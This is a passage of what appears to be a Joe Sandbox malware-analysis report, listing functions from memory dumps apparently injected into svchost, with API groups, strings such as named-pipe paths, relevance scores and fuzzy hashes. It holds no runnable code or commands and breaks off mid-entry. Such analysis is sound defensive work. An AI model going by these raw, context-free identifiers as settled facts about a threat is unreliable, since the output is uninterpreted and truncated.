                                                                      • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                      • String ID: wr
                                                                      • API String ID: 1092925422-2678910430
                                                                      • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                      • Instruction ID: 2d2ae68968ed466a8bd9f8edaa945d4ff509ed3e6404d4b55c90d98096d8e2c2
                                                                      • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                      • Instruction Fuzzy Hash: 58118E7A321B4082EF949B11F904AA9B3E8F789B94F140028DE8A037A5EF7DC505C704
                                                                      Function 0000014E25ED5B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Thread$Current$Context
                                                                      • String ID:
                                                                      • API String ID: 1666949209-0
                                                                      • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                      • Instruction ID: dbf7c04510264e3aa80be77e2b965e56a4bbf761f2bbcec70d3958daf628b150
                                                                      • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                      • Instruction Fuzzy Hash: 9AD1BA76219B8881DAB09B06E99079A77E8F3C9B84F101116EACE47BB5DF7CC551CB00
                                                                      Function 0000014E25ED2F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocFree
                                                                      • String ID: dialer
                                                                      • API String ID: 756756679-3528709123
                                                                      • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                      • Instruction ID: 84f0a49ae497355131a2aac26c953b08be1bccc37f8d4e7dda7159b87278197d
                                                                      • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                      • Instruction Fuzzy Hash: 5B31C732712B6183EB95CF16EE40BA9A7DDFB45B90F0854249E4A47B76EF75C461C300
                                                                      Function 0000014E25EDCFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Value$ErrorLast
                                                                      • String ID:
                                                                      • API String ID: 2506987500-0
                                                                      • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                      • Instruction ID: 471d6bd78421e7f0d323d5dd982a26040bfcc08c4fbacc160c0418542b83e496
                                                                      • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                      • Instruction Fuzzy Hash: 05115E3020224481FAE99B219F45BED61CEBB877F0F146724A837467F6DEE988019341
                                                                      Function 0000014E25ED199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                      • String ID:
                                                                      • API String ID: 517849248-0
                                                                      • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                      • Instruction ID: ca7a516169cdbcbbb0f1702b00ec33b0ff134d6781b8bdceb78e20af0a0e2d48
                                                                      • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                      • Instruction Fuzzy Hash: 5F016971710B4082EBA4DB52B948B9963E9F788BD4F984035DE4E43766DF7CC989C700
                                                                      Function 0000014E25ED36C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                      • String ID:
                                                                      • API String ID: 449555515-0
                                                                      • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                      • Instruction ID: cd6817a2b86cb7a5d2c6d38da5d770d31958944fdfcb510b49edaf7ad4408b8a
                                                                      • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                      • Instruction Fuzzy Hash: C6012DB5222B4082FFA59B21FD08B9A73E8BB49B96F140528CD4A07775EFBDC1088700
                                                                      Function 0000014E25ED9005 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 135COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                      • String ID: csm$f
                                                                      • API String ID: 2395640692-629598281
                                                                      • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                      • Instruction ID: 9b2a1657cc1f5397dbb91559528021781e071057780ce7782a4c857206022f56
                                                                      • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                      • Instruction Fuzzy Hash: 2751BD327126018AEB94DF15EE48F9837DEF366B98F129524DA47877ACEBB5C841C700
                                                                      Function 0000014E25ED8FE8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                      • String ID: csm$f
                                                                      • API String ID: 2395640692-629598281
                                                                      • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                      • Instruction ID: d85250e2fd4da4f793b085a3e5f2ae8afe95a5ea4a6e7ad585896a302fadfb02
                                                                      • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                      • Instruction Fuzzy Hash: C431CB3221274086E790DF11ED08B9937ECF356B98F168414EE8B837A9CBB9C940C700
                                                                      Function 0000014E25ED1A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: FinalHandleNamePathlstrlen
                                                                      • String ID: \\?\
                                                                      • API String ID: 2719912262-4282027825
                                                                      • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                      • Instruction ID: eb17f0113111d357bb3c0c2e1e39b944648b27065071a28b27f10ee0fb883d04
                                                                      • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                      • Instruction Fuzzy Hash: 6EF0A47271064082EBB08F20FA84B9963A8F74CBA8F944020CA4A46A65DFBCC64DCB00
                                                                      Function 0000014E25EDBC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                      • API String ID: 4061214504-1276376045
                                                                      • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                      • Instruction ID: ae1ffe23413f3f9ac290ddb9a375ecfb0d94467b0eec39550c61245b0545be19
                                                                      • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                      • Instruction Fuzzy Hash: FAF0F6B132270581EF508F24F944B9923ACFB89770F601219CA6B051F4DFBCC044C700
                                                                      Function 0000014E25ED3044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CombinePath
                                                                      • String ID: \\.\pipe\
                                                                      • API String ID: 3422762182-91387939
                                                                      • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                      • Instruction ID: a8a97001e52402dc951ae60ecd85aaaa03d7a8c3e915bbc4e21f66f82a1337c1
                                                                      • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                      • Instruction Fuzzy Hash: 0AF08270324B8082EE908F13BB0459962A9BB8CFE0F185130EE4707B39DFBCC8458700
                                                                      Function 0000014E25ED50D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentThread
                                                                      • String ID:
                                                                      • API String ID: 2882836952-0
                                                                      • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                      • Instruction ID: f51a204a033d80b8679267c1f31be89dd82c60e0a798355614f27ff34b059d90
                                                                      • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                      • Instruction Fuzzy Hash: 1102CD32619B8486D7A0CB55F99079AB7F8F3C5794F105016EA8E47B68DFBDC854CB00
                                                                      Function 0000014E25ED5710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentThread
                                                                      • String ID:
                                                                      • API String ID: 2882836952-0
                                                                      • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                      • Instruction ID: d9fcac21c386e716bf48634b26dfdb2d1c4fc5b9b771d717854196da0f0511ca
                                                                      • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                      • Instruction Fuzzy Hash: AD61AC3651AB44C6E7A4CB15E984B5A77E8F389794F102116EA8E47BB8DBBCC950CF00
                                                                      Function 0000014E255E3504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2575673989.0000014E255D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E255D0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e255d0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: _set_statfp
                                                                      • String ID:
                                                                      • API String ID: 1156100317-0
                                                                      • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                      • Instruction ID: 963a1978ace91ebc5c95c6f5ace322840b4e8d1a0b49158cfbdd5de4de91675c
                                                                      • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                      • Instruction Fuzzy Hash: D011E333EF0A0351FA641128E741BE916C97B59371F7B863AA96B063F6CAF4E8424300
                                                                      Function 0000014E25EE4104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: _set_statfp
                                                                      • String ID:
                                                                      • API String ID: 1156100317-0
                                                                      • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                      • Instruction ID: 0b394f0222ad10ed4458312801fa377dc5de40dcb936ecf53148d1b0853e27b0
                                                                      • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                      • Instruction Fuzzy Hash: 98119E32A30F5021FFE41568EE56BE911C97FAC3B8F380664A977466F68AA8C9414304
                                                                      Function 0000014E255DF040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2575673989.0000014E255D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E255D0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e255d0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                      • API String ID: 3215553584-4202648911
                                                                      • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                      • Instruction ID: 9797d107109e69bce09e45c8849dd5af6dda54904592a7202821d35037d3ca46
                                                                      • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                      • Instruction Fuzzy Hash: 0E61D233E8264282FA659BA4EF44FEE66E9FB87780F544519CA0B037B4DBB4D841C700
                                                                      Function 0000014E25EDAA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CallEncodePointerTranslator
                                                                      • String ID: MOC$RCC
                                                                      • API String ID: 3544855599-2084237596
                                                                      • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                      • Instruction ID: fdb2a3d7d4dbc778feb0db44ec4dd92249fa2fb54b61256c6ae827feb09f3166
                                                                      • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                      • Instruction Fuzzy Hash: F061AE33A02B488AEB50DF65D940BDD77E9F345B98F046215EF4A17BA8DBB8C185C700
                                                                      Function 0000014E255DA178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2575673989.0000014E255D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E255D0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e255d0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                      • String ID: csm$csm
                                                                      • API String ID: 3896166516-3733052814
                                                                      • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                      • Instruction ID: c6c76a540a17df33cf6b33b62d86c749f28f34716d9120ac06b738ee0068be7b
                                                                      • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                      • Instruction Fuzzy Hash: 5751F433941382CAEB748F62DA40BDA77E9F356B84F184115EE4A47BE5CBB8C490C701
                                                                      Function 0000014E25EDAD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                      • String ID: csm$csm
                                                                      • API String ID: 3896166516-3733052814
                                                                      • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                      • Instruction ID: 44bf977dff1b5ec5671c769ff3bcf65ab199377a69307d9c1e4287435c2f443d
                                                                      • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                      • Instruction Fuzzy Hash: A051B872101380CAEBB48F25DA44BDDB7ECF356B89F146115DA5A47BE5CBB4D690C700
                                                                      Function 0000014E255D8405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2575673989.0000014E255D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E255D0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e255d0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                      • String ID: csm$f
                                                                      • API String ID: 3242871069-629598281
                                                                      • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                      • Instruction ID: 1999b6c2b026b6124529a4adba9e946b963ca658d3889168c5ba82a1dd7089a5
                                                                      • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                      • Instruction Fuzzy Hash: C351AF33A426029AEB14CF15EA54F9937D9F352FE8F558124DA17437A8EBB8D840C704
                                                                      Function 0000014E255D83E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2575673989.0000014E255D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E255D0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e255d0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                      • String ID: csm$f
                                                                      • API String ID: 3242871069-629598281
                                                                      • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                      • Instruction ID: 3dc8e3defbb4cae5588ebab0199bf55474b8a63869ade0abb043a486d88ee41a
                                                                      • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                      • Instruction Fuzzy Hash: D6318A32A4264196E7149F11EA44B9937E8F742FE8F158014AE9B437A4DBBCD940CB04
                                                                      Function 0000014E25EE2058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: FileWrite$ConsoleErrorLastOutput
                                                                      • String ID:
                                                                      • API String ID: 2718003287-0
                                                                      • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                      • Instruction ID: 3f00fd9f30143d8ec0dc68171cd42f49f7c9ce272e972ea8ec581adce4c9e820
                                                                      • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                      • Instruction Fuzzy Hash: C9D10372B24A8089E751CFB9D6407DC3BF9F3547A8F244216CE5E97BA9EA74C506C340
                                                                      Function 0000014E25ED14A4 Relevance: 6.3, APIs: 5, Instructions: 38memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$Free
                                                                      • String ID:
                                                                      • API String ID: 3168794593-0
                                                                      • Opcode ID: 637b04ff62da02b8b8c355a0b12521a64aeb4c7988103f0530a9550870a0a79b
                                                                      • Instruction ID: b82fb3b3cd8c279cf6941b9ee5c2e82ae40e5202c2e4416826012ed8ae3623a2
                                                                      • Opcode Fuzzy Hash: 637b04ff62da02b8b8c355a0b12521a64aeb4c7988103f0530a9550870a0a79b
                                                                      • Instruction Fuzzy Hash: F00188B2620B90C6EB85DF62FE0469E67E8F789F91F144028EA4E4372ADE78C050C740
                                                                      Function 0000014E25EE2980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: ConsoleErrorLastMode
                                                                      • String ID:
                                                                      • API String ID: 953036326-0
                                                                      • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                      • Instruction ID: 667ac3d07cb23805d030a7f0e5a818e80c7b8aff588618ff8d56236ba759a437
                                                                      • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                      • Instruction Fuzzy Hash: 3991E472B20A5085FBA1DF75DA40BED3BE9B744BA8F244109DE0B676A5DBB4C482C700
                                                                      Function 0000014E25ED7960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                      • String ID:
                                                                      • API String ID: 2933794660-0
                                                                      • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                      • Instruction ID: 352795bb2acd6d720caa6935447fbf89c0e2d7ba74be2edce17ed9c1fa8f5351
                                                                      • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                      • Instruction Fuzzy Hash: C9113032720F0589EF40CF60ED557E833A8F759768F441E25DA6E467A5DFB8C1988380
                                                                      Function 0000014E25ED253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: FileType
                                                                      • String ID: \\.\pipe\
                                                                      • API String ID: 3081899298-91387939
                                                                      • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                      • Instruction ID: 3de46b81bbb003b110b723b7cc6fb6e414f3f1eb92d30ba74537780c1b1e2005
                                                                      • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                      • Instruction Fuzzy Hash: CB71B13620178186EBF49F25EE44BEA67DCF38AB84F542026DD0B53BA9DEB5C6458700
                                                                      Function 0000014E255D9E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2575673989.0000014E255D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E255D0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e255d0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CallTranslator
                                                                      • String ID: MOC$RCC
                                                                      • API String ID: 3163161869-2084237596
                                                                      • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                      • Instruction ID: 4f5b99736065405e28801979f0886448ceaedeffcf3269bf2fc32525654e0c9f
                                                                      • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                      • Instruction Fuzzy Hash: 99615633A02B858AEB20DF65D980BDD77B4F349B98F044215EF4A17BA8DBB8D195C740
                                                                      Function 0000014E25ED2330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: FileType
                                                                      • String ID: \\.\pipe\
                                                                      • API String ID: 3081899298-91387939
                                                                      • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                      • Instruction ID: 47ea13e0a66e27f5222f985dc41e25c44af3528301242c2dfdf270eb08d24527
